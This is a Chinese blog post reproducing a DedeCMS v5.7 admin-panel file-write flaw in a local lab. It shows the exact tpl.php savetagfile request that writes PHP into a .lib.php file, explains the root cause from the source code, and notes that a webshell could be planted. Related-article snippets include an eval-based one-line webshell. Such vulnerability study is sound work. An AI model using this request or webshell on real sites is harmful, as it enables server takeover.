DEDEC CMS v5.7 文件上传

最新推荐文章于 2023-12-08 15:45:19 发布
最新推荐文章于 2023-12-08 15:45:19 发布
阅读量2.3k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: web 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52469895/article/details/124096039
本文详细解析了Dedecms系统的一个文件上传漏洞,通过获取token值并构造特定请求,实现了将PHP代码写入系统文件中,导致PHP文件被执行。漏洞复现过程包括获取token、构造恶意链接并触发文件保存操作。由于系统未对上传参数进行有效安全检查,存在重大安全隐患。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先我们要进入后台

密码账号都是admin

访问/dede/tpl.php?action=upload,审查源码,获取我们的token值。

可以用taken值直接文件上传

拿到token值后构造dede/tpl.php?filename=shell.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=c12bf4a8330732e9f45a492d54399803

然后访问http://127.0.0.1/dedecms/include/taglib/shell.lib.php

php文件成功被执行

如果我们刚刚写的是一句话木马拿就可以直接蚁剑连接

漏洞复现原因

想一想我们的思路:
1、获取token值
2、访问指定的链接

就把我们的代码写入到/include/taglib/xxx.lib.php中

token值很容易获取,那么问题就是在那个链接上面:

http://127.0.0.1/dedecms/dede/tpl.php?filename=shell.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=c12bf4a8330732e9f45a492d54399803

看一下参数,就知道这是一个文件保存的操作。

问题出现在tpl.php

我们看看它写了什么

找到问题代码

首先会匹配正则, 要以.lib.php结尾。

然后会将 $content 写入到 $filename 中。

那么我们要跟踪一下文件对这两个参数进行的处理。

然后我们回过头来看整个文件的代码。

$filename = preg_replace("#[\/\\\\]#", '', $filename); //line21


$tagname = preg_replace("#\.lib\.php$#i", "", $filename); //line260
$content = stripslashes($content); //line261

可以看出,只有替换,并没有对参数进行安全防护措施。

手机软件APP下载类网站Pbootcms模板 游戏软件应用网站源码 模板自适应手机端
百创科技
12-26 757
友好的seo,所有页面均都能完全自定义标题/关键词/描述,PHP程序,安全、稳定、快速;用低成本获取源源不断订单!手机软件APP下载类网站pbootcms模板 游戏软件应用网站源码 模板自适应手机端。pbootcms内核开发的网站模板,该模板适用于手机APP网站、游戏软件网站等企业,当然其他行业也可以做,只需要把文字图片换成其他行业的即可;自适应,同一个后台,数据即时同步,简单适用!
织梦安全教程
小板的博客
12-22 222
一,修改后台文件夹名字,改成只有自己知道的,不用默认dede 二、删除member,special,install文件夹,robots.txt 三、plus 文件夹除了以下 1个文件夹 和 5个php文件,其他的文件统统删除 /plus/img (这个文件夹) /plus/count.php /plus/diy.php /plus/list.php 四、删除以下文件 include/helpers/mda.helper.php include/taglib/mda.lib.php /dede/tpl.php
DedeCMS V5.7文件上传漏洞复现
weixin_51047454的博客
03-20 1570
CVE-2018-20129-DedeCMS V5.7 SP2前台文件上传漏洞复现 登录管理页面后,开启会员功能(默认是关闭的) 回到首页,用户登录后,点击会员中心。 打开内容中心(第一次进入会提示完善个人信息,完善一下,不然不能操作) 重点开始 4. 发表文章的表单最下方有一个图片的图标,点击可以选择上传图片到服务端。 制作图片码 上传 抓包修改文件后缀:p*hp 连接,成功 代码审计 为什么用.ph%p就可以绕过检测了?我们来看看源码中的问题部分。 找到图片的校验部分的源
DedeCMS-V5.7文件上传
shurongyugong的博客
11-24 668
先创建一个授权完成的用户,然后通过重置密码的漏洞登陆,再进行文件上传
dedecms 文件上传 (CVE-2019-8933)
weixin_57567689的博客
10-21 843
dedecms 文件上传 (CVE-2019-8933)
dedecms 文件上传(CVE-2019-8933)
xy_wjyjw的博客
10-28 555
点击生成——更新主页HTML——主页位置——选择主页模板(浏览选择一句话木马文件)——首页模式——更新主页HTML。在内容中输入后门代码(一句话木马)
DedeCms5.7后台任意文件上传 getshell
抚琴
01-07 791
DedeCms5.7后台任意文件上传 getshell 上传的木马为 <?php @eval($_POST[1]);?> 使用蚁剑连接 拿到shell 代码在我博客里关注即可下载
form窗口上放一个label,如何能找到这个label在哪个文件中使用
awulei的专栏
10-11 7659
欢迎大家前往 "腾讯云+社区" ,获取更多腾讯海量技术实践干货哦~ 本文由 "liuxuewen " 发表于 "云+社区专栏" 在本文中,我们将研究深度学习和机器学习之间的差异。我们将逐一了解它们,然后讨论他们在各个方面的不同之处。除了深度学习和机器学习的比较外,我们还将研究他们未来的趋势和走向。 http://baobao.baidu.com/article/b38f781a9b4c89b7f0...
软件游戏下载站源码(还可以做手赚网)
02-22
appcms模板源码,适合做应用网站,游戏下载网站,自己已经修改过,安装比较简单。软件下载站源码,手机应用市场cms源码,带前后台,带一点数据,还适合做手赚网、游戏网站、软件下载站。
KVM存储管理
qq_26350199的博客
04-11 833
KVM存储池就是一个大的容器,里面主要是虚拟机的镜像文件和其他的磁盘相关文件。当虚拟机磁盘空间不够时,需要对其进行添加和管理。 KVM存储池是被libvirt所管理的文件、目录或存储设备,存储池可以位于本地,也可以通过网络共享,存储池最终可被虚拟主机所使用。 默认libvirt使用基于目录的dir的存储池设计,/var/lib/libvirt/images目录就是默认的存储池。 本地分区来作为存储池 1、准备一个格式化的分区 查看磁盘是否有空闲的空间。此处可以看到在sda3结束sectors的值与/dev/
DedeCms5.7 文件上传漏洞
weixin_53303754的博客
10-15 534
1.打开链接确定服务是否开启:2.登录后台账号密码为:admin\admin123。
DedeCMS文件上传漏洞
最新发布
Loooyoooxooo的博客
12-08 997
1、此版本的DedeCMS后台存在文件上传漏洞,在渗透过程中我们可以通过利用其它漏洞或者暴力破解的方式获取管理员账号和密码,并登录到后台进行此漏洞利用(此实验主要练习文件DedeCMS上传漏洞利用);6、依次点击 “生成” - “更新主页HTML” - “浏览选择新建的模板”,在"主页位置"输入框中将文件后缀修改为.php,首页模式选择"生成静态",并点击更新主页HTML。>换成一句话木马<?7、进入生成的链接,成功执行php代码,漏洞测试成功,在进行动态的输出框中,点击"浏览"
dedecms v5.7 sp2后台任意文件上传
公众号shadow sock7
01-24 1836
来源: https://github.com/SukaraLin/php_code_audit_project/blob/master/dedecms/dedecms v5.7 sp2 代码审计.md 上传普通图片文件,然后在后面追加php代码; 保持Content-Type为image/png。 修改上传图片文件的后缀为.php。 得到路径为: /DedeCMS-V5.7-UTF8-SP2/u...
dedecms支持pdf一键上传
weixin_52041354的博客
08-18 177
1.获取光标代码部分,大部分都是直接利用TheViper的代码,只是做了简单的修改,在获取光标的位置添加了插件子集document对象,因为直接使用document对象获取不到光标位置。编辑器中的图片地址已经全部被替换成了服务器的图片地址,其它的用户也能够正常访问。1.从word中复制图片为rtf格式,不能被保存,并解析图片,有待解决;//设置编辑器的内容。...
dedecms编辑器支持Word文档上传
weixin_52041354的博客
07-12 131
这种方法是servlet,编写好在web.xml里配置servlet-class和servlet-mapping即可使用后台(服务端)java服务代码:(上传至ROOT/lqxcPics文件夹下)
织梦dedecms漏洞修复大全含任意文件上传漏洞与注入漏洞
zxy840552216的博客
07-12 1441
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题,今天就为大家讲解一下如何修复任意文件上传漏洞与注入漏洞。任意文件上传漏洞修复包含一个文件/include/dialog/select_soft_post.php;SQL注入漏洞包含5个文件/include/filter.inc.php /member/mtypes.php /member/pm.php /plus/guestbook/edit.inc.php /plus/search.php...
dedecms教程:实现dedecms前台会员中心上传附件方法
02-01 1212
非原创,要在会员发布文章时要能发布一些doc,xsl,ppt之裡的小附件。 以为只是设置问题,于是百度一下,就知道DEDECMS根本没有预留这个功能, 没办法,只好去研究一下它,终于找到解决方法 修改以下几个文件 1. \include\FCKeditor\fckconfig.js 把 Quote: FCKConfig.ToolbarSets["Member
dedecms任意文件上传漏洞(select_soft_post.php)
L_melody的博客
08-14 4027
文件:select_soft_post.php 路径:/include/dialog/select_soft_post.php 原因:在获取完整文件名时,没有将会对服务器造成危害的文件格式过滤掉,因此需要手动添加代码过滤 解决方法: 1、在 select_soft_post.php 中找到如下代码: $fullfilename = $cfg_basedir.$activepath.'...
织梦dedecms上传漏洞uploadsafe.inc.php修复方法
qq_31763129的博客
08-18 1758
dedecms上传漏洞uploadsafe.inc.php,这里直接给出修复漏洞的方法,希望大家可以多学习。         今天分享的漏洞是一个关于织梦dedecms上传漏洞修复方法,主要是文件/include/uploadsafe.inc.php。         有2个地方:         1、搜索 ${$_key.'_size'} = @filesize($$_key);  ...
给我由白色渐变到绿色的20个颜色,用颜色标签表示,依次用逗号连接
05-21
这里是由白色渐变到绿色的20个颜色,使用颜色标签表示:#FFFFFF, #FEFDFB, #FDFCF8, #FBFAF5, #FAF9F2, #F8F7EF, #F7F6EC, #F5F4E9, #F3F2E6, #F2F1E3, #F0EFE0, #EEEEDD, #ECECD9, #EAEA... #E2E2CA, #E0E0C7, #DEDEC4
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值